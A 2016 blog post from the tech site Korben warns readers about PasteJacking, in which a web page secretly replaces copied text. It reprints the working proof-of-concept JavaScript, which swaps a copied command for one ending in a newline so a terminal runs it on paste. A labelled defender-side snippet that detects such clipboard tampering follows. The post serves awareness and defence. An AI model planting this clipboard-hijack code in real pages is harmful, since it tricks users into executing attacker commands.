

Korben

Original site: Korben


Beware of PasteJacking (and please don't copy-paste this article)

Tuesday 24 May 2016 at 10:18

The technique isn't new, and I already covered the problem in 2015. Basically, with a simple bit of JavaScript, a page can put something else into the computer's clipboard when the user copies and pastes.

This can cause plenty of trouble, especially on sites that give command lines that people copy and paste without thinking. I have already warned about this, so I won't go over it again (go read the article linked above). However, for those who want to understand how it works, a piece of code named PasteJacking is available on Github.

Here is the code in question:

<html>
<body>
Copy the text below and run it in your terminal for totally not evil things to happen.
<br>

<p>echo "not evil"</p>
<script>
function copyTextToClipboard(text) {
  var textArea = document.createElement("textarea");

  //
  // *** This styling is an extra step which is likely not required. ***
  //
  // Why is it here? To ensure:
  // 1. the element is able to have focus and selection.
  // 2. if element was to flash render it has minimal visual impact.
  // 3. less flakiness with selection and copying which **might** occur if
  //    the textarea element is not visible.
  //
  // The likelihood is the element won't even render, not even a flash,
  // so some of these are just precautions. However in IE the element
  // is visible whilst the popup box asking the user for permission for
  // the web page to copy to the clipboard.
  //

  // Place in top-left corner of screen regardless of scroll position.
  textArea.style.position = 'fixed';
  textArea.style.top = 0;
  textArea.style.left = 0;

  // Ensure it has a small width and height. Setting to 1px / 1em
  // doesn't work as this gives a negative w/h on some browsers.
  textArea.style.width = '2em';
  textArea.style.height = '2em';

  // We don't need padding, reducing the size if it does flash render.
  textArea.style.padding = 0;

  // Clean up any borders.
  textArea.style.border = 'none';
  textArea.style.outline = 'none';
  textArea.style.boxShadow = 'none';

  // Avoid flash of white box if rendered for any reason.
  textArea.style.background = 'transparent';
  textArea.value = text;

  document.body.appendChild(textArea);

  textArea.select();

  try {
    var successful = document.execCommand('copy');
    var msg = successful ? 'successful' : 'unsuccessful';
    console.log('Copying text command was ' + msg);
  } catch (err) {
    console.log('Oops, unable to copy');
  }

  document.body.removeChild(textArea);
}

document.addEventListener('keydown', function(event) {
  var ms = 800;
  var start = new Date().getTime();
  var end = start;
  while (end < start + ms) {
    end = new Date().getTime();
  }
  copyTextToClipboard('echo "evil"\n');
});

</script>
</body>

</html>

For this to work, the victim has to press CTRL+C (or CMD+C on OS X). If they right-click and choose "Copy", it won't work.
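A defender-side check for the behaviour described above, as an added example that is not part of the original article or the PasteJacking repository: it compares the text shown on the page with what actually landed in the clipboard and flags the trailing newline that makes a terminal run the command as soon as it is pasted. The function names and the way the two strings are obtained are assumptions for illustration.

```javascript
// Added example, not code from the article or the PasteJacking repository.
// inspectClipboard / neutralize are hypothetical helper names.

// Compare what the user believes they copied with the real clipboard content.
function inspectClipboard(visibleText, clipboardText) {
  const findings = [];

  // The demo replaces the selection, so the clipboard no longer matches the page.
  if (clipboardText.trim() !== visibleText.trim()) {
    findings.push('mismatch');
  }
  // A line break makes the shell execute the command as soon as it is pasted.
  if (/[\r\n]/.test(clipboardText)) {
    findings.push('newline');
  }
  // Other control characters (ESC, backspace, ...) can hide or rewrite what is shown.
  if (/[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]/.test(clipboardText)) {
    findings.push('control-char');
  }
  return findings;
}

// Make text safe to paste for review: one line, no control characters,
// so nothing runs until the user presses Enter themselves.
function neutralize(clipboardText) {
  return clipboardText
    .replace(/[\r\n]+/g, ' ')
    .replace(/[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]/g, '')
    .trim();
}

// Constructed sample: the two strings used by the demo page above.
const shown = 'echo "not evil"';
const hijacked = 'echo "evil"\n';

console.log(inspectClipboard(shown, shown));
console.log(inspectClipboard(shown, hijacked));
console.log(neutralize(hijacked));
```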


This wonderful and unequalled article, entitled: Beware of PasteJacking (and please don't copy-paste this article), was published on Korben, the only site that loves you more than your parents do.